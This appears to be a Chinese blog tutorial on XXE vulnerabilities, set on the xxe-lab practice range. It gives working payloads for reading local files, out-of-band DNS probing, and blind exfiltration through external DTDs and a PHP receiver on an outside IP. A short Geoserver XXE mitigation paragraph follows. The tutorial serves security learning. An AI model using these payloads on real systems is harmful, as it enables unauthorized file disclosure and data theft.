Xxe漏洞

Xxe漏洞

一,Xml:是一种用来传输存储数据的语言,与html语法相似。但xml标签没有预定义,必须使用者来进行定义;同时,xml用于传输存储数据,被设计为具有自我描述性。而html用以显示数据,焦点是数据的外观(现在xml传输方式使用较少,大部分为json或其他类型的传参方式)。

二,       漏洞介绍

1, 本质

xml 是用来传输数据,那若在传输的数据里面写的是恶意数据,传到后端被解析了,执行了命令,从而实现危害利用(传输恶意xml语句)。

2, 分类

有无回显。

3, 靶场:xxe-lab(使用phpstudy时,仅解压后缀名为.php的压缩包到www文件夹下)。

三,       漏洞使用

抓包,看是否为xml传参方式

若是,可以考虑在这个传输恶意数据,因为登录口传输的是 xml ,那么后端接收的时候,肯定是 xml 解析,既能会解析,那么我们就传恶意的 xml 数据给它解析,让他执行。

1, 有回显

读取文件

<?xml version="1.0"?>

<!DOCTYPE xxxxx [

<!ENTITY test SYSTEM "file:///d:/1.txt">

]>

<user><username>&test;</username><password>123456</password></user>

解 释 : 将 "file:///d:/1.txt" 赋 值 给 变 量 test , 然 后 服 务 器 在 检 查 username 时 就 会 解 析

"file:///d:/1.txt" 在黑盒测试中,我们可以抓个包看看,提交的数据是不是 xml 的这种树状的格式,或者看看content-type 是不是 xml 类型

2、外部引用实体 dtd_x0005_:

<?xml version="1.0" ?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "http://111.229.218.169/1.dtd">

%file;

]>

<user><username>&send;</username><password>123456</password></user>

1.dtd 中写着

<!ENTITY send SYSTEM "file:///d:/1.txt">

对于上段代码的解释:有一个实体声明(ENTITY declaretion):%file。实体声明定义了一个名为%file

的实体,该实体的值是从 https://111.229.218.169/1.dtd 获取的内容,在 username 元素中,使用了

一个实体引用“&send”来表示实体的值,实体&send 中解析 1.dtd 文件中,得到&send 最后值为执行

file:///d:/1.txt

2、无回显

发现能带外了,说明执行了,再去利用

<?xml version="1.0"?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "http://72y3s1.dnslog.cn">

%file;

]>

<user><username>&send;</username><password>123456</password></user>

读取文件

<?xml version="1.0"?>

<!DOCTYPE ANY[

<!ENTITY % file SYSTEM "file:///d:/1.txt">

<!ENTITY % remote SYSTEM "http://111.229.218.169/2.dtd">

%remote;

%all;

]>

<root>&send;</root>

2.dtd

<!ENTITY % all "<!ENTITY send SYSTEM 'http://111.229.218.169/get.php?file=%file;'>" >

get.php 中

<?php

$data=$_GET['file'];

$myfile=fopen("file.txt","w+");

fwrite($myfile,$data);

fclose($myfile);

?>

  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Geoserver是一个开源的地理信息系统(GIS)软件,它用于发布和共享地理数据和服务。然而,Geoserver在某些情况下可能存在一个称为XXE(XML外部实体)漏洞XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入攻击。攻击者可以通过向Geoserver发送包含恶意XML实体引用的请求,来读取系统上的敏感文件或执行任意代码。 为了防止Geoserver XXE漏洞的利用,有几个关键的步骤可以采取: 1. 更新Geoserver:确保您使用的是最新版本的Geoserver。开源软件的维护者通常会修复已知的漏洞,并在新版本中发布修复程序。 2. 安全的配置文件处理:确保Geoserver的配置文件中没有不必要的文件,因为攻击者可能会利用这些文件访问敏感信息。 3. 过滤和验证用户输入:在输入和输出时,对用户提交的XML数据进行充分验证和过滤。这将有助于防止输入的恶意XML实体被执行。 4. 强化安全意识:向Geoserver用户和管理员提供适当的培训,以提高他们对安全问题的意识。这将有助于减少社会工程学攻击和恶意操作。 总之,Geoserver XXE漏洞是一种可以利用的安全漏洞,但通过更新软件、安全配置文件处理、过滤验证用户输入和提高安全意识,可以有效地减少这种漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值